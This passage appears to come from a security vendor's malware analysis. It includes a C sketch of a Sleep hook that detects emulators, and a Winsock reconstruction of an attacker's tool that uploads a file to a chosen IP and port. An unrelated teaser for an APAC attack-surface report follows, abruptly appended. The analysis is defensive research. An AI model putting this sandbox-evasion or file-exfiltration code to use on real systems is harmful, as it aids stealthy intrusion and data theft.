The Sleep function redirected back to the malware code
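
The available data does not show what the redirected Sleep is ultimately used for. A common reason to instrument Sleep in this way, however, is to spot emulators that fast-forward delays; the short C sketch below illustrates that idea under our assumption and is not a reconstruction of the actual “HookSleep” code.

#include <windows.h>

/* Illustrative replacement for Sleep(): if the environment fast-forwards
   the delay (as many emulators and sandboxes do), far less real time
   elapses than was requested. This logic is an assumption for
   illustration only, not the actual HookSleep implementation. */
static int g_probably_emulated = 0;

static VOID WINAPI HookedSleep(DWORD milliseconds)
{
    ULONGLONG before = GetTickCount64();
    SleepEx(milliseconds, FALSE);              /* perform the real wait */
    ULONGLONG elapsed = GetTickCount64() - before;

    if (elapsed + 500 < milliseconds)          /* wait was skipped or cut short */
        g_probably_emulated = 1;
}

int main(void)
{
    HookedSleep(3000);
    return g_probably_emulated;                /* non-zero if emulation suspected */
}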

s.exe

This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:

s.exe <file> <IP address> <port> <up|down>

This is basically netcat without all the features; the benefit, from the attacker’s point of view, is that it draws less attention than netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and write it to a file (albeit with some junk characters added to the results). We also found that the sample was incapable of executing anything after a download or upload.

The algorithm is simple: network startup, argument parsing, socket creation, then either sending a file or waiting to receive one, depending on the arguments. The decompiled main function can be seen below, followed by a short sketch of comparable functionality.

Decompiled network transfer tool
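
For reference, the upload path of such a tool can be approximated in a few dozen lines of Winsock code. The sketch below is our illustration only: the program name, argument handling, buffer size and minimal error handling are assumptions, and the real s.exe also implements the “down” direction.

#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")   /* link with ws2_32 (e.g. -lws2_32 on MinGW) */

/* Approximate upload path of a netcat-like transfer tool:
   transfer.exe <file> <IP address> <port> up
   (names and structure are assumptions, not the original code) */
int main(int argc, char **argv)
{
    if (argc != 5 || strcmp(argv[4], "up") != 0) {
        printf("usage: %s <file> <ip> <port> up\n", argv[0]);
        return 1;
    }

    WSADATA wsa;                                           /* network startup */
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) return 1;

    SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);  /* create socket */
    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons((unsigned short)atoi(argv[3]));
    inet_pton(AF_INET, argv[2], &addr.sin_addr);

    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) != 0) return 1;

    FILE *f = fopen(argv[1], "rb");                        /* stream file to peer */
    if (!f) return 1;
    char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof(buf), f)) > 0)
        send(s, buf, (int)n, 0);

    fclose(f);
    closesocket(s);
    WSACleanup();
    return 0;
}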

[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.

External attack surface and ongoing cybercriminal activity in APAC region https://securelist.com/external-attack-surface-and-ongoing-cybercriminal-activity-in-apac-region/107430/ https://securelist.com/external-attack-surface-and-ongoing-cybercriminal-activity-in-apac-region/107430/#respond Mon, 19 Sep 2022 14:00:21 +0000 https://kasperskycontenthub.com/securelist/?p=107430

To prevent a cyberattack, it is vital to know what your organization’s attack surface is. To be prepared to repel cybercriminal attacks, businesses around the world collect threat intelligence themselves or subscribe to threat intelligence services.

Continuous threat research enables Kaspersky to discover, infiltrate and monitor resources frequented by adversaries and cybercriminals worldwide. Kaspersky Digital Footprint Intelligence leverages this access to proactively detect threats aimed at organizations, their assets and brands, and to alert our customers to them.

In our public reports, we provide an overview of threats for different industries and regions based on the anonymized data collected by Kaspersky Digital Footprint Intelligence. Last time, we shared insights on the external attack surface for businesses and government organizations in the Middle East. This report focuses on Asia Pacific, Australia and China. We analyzed data on external threats and criminal activity affecting more than 4,700 organizations in 15 countries and territories across the region.

Main findings

  • Kaspersky Digital Footprint Intelligence found 103,058 exposed network services with unpatched software. Government institutions’ network resources were the most affected by known vulnerabilities.
  • More than one in ten vulnerabilities found on organizations’ external perimeters was ProxyLogon. In Japan, this vulnerability was found in 43% of all unpatched services.
  • 16,003 remote access and management services were accessible to attackers, with government institutions again the most affected.
  • On the dark web, attackers mainly buy and sell access to organizations in Australia, mainland China, India and Japan.
  • Australia, mainland China, India and Singapore account for 84% of all data leak sell orders placed on dark web forums.

You can find more information about the external attack surface for organizations in the APAC region, as well as the data sold and searched for on the dark web, in the full version of our report. Fill in the form to download it.

If you do not see the form above this sentence, please add this page to the exceptions in your browser privacy settings and/or ad blocker.
